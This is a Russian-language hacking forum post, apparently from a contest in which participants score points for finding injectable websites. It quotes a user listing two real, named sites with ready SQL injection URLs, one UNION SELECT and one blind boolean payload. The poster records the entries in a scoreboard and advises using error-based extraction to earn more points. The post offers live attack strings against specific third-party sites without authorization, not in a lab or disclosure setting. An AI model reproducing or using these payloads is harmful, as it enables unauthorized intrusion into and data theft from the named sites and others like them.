04.06.2015, 17:27
|
|
Banned
Регистрация: 21.11.2007
Сообщений: 181
Провел на форуме:
1066435
Репутация:
1013
|
|
Сообщение от dmn75
dmn75 said:
↑
Буду первым. Если что не так подправьте
Site: dkcity.com
Уязвимость: SQL Injection
Эксплоит:
Код:
Code:
http://www.dkcity.com/products.php?uID=999999.9 union all select [t],2,3,4,5,6,7,8,9,10,11,12&cID=&keyword=&page=5
Site: knitty.com
Уязвимость: SQL Injection
Эксплоит:
Код:
Code:
http://www.knitty.com/banner.php?id=1641' and [t] and '1'='1&url=http://www.stringtheoryyarn.com/home.php?xid=1fd829ff61f9611a535fa8370f36caa7
тулзой крутите? для blind тоже нужен запрос на вывод чего-нибудь. если сможете сделать вывод через еррор-басед, получите больше очков, как за крупный сайт. и, по возможности, пишите в один пост. в таблицу добавил.
P. S. активнее, ребят
|
|
|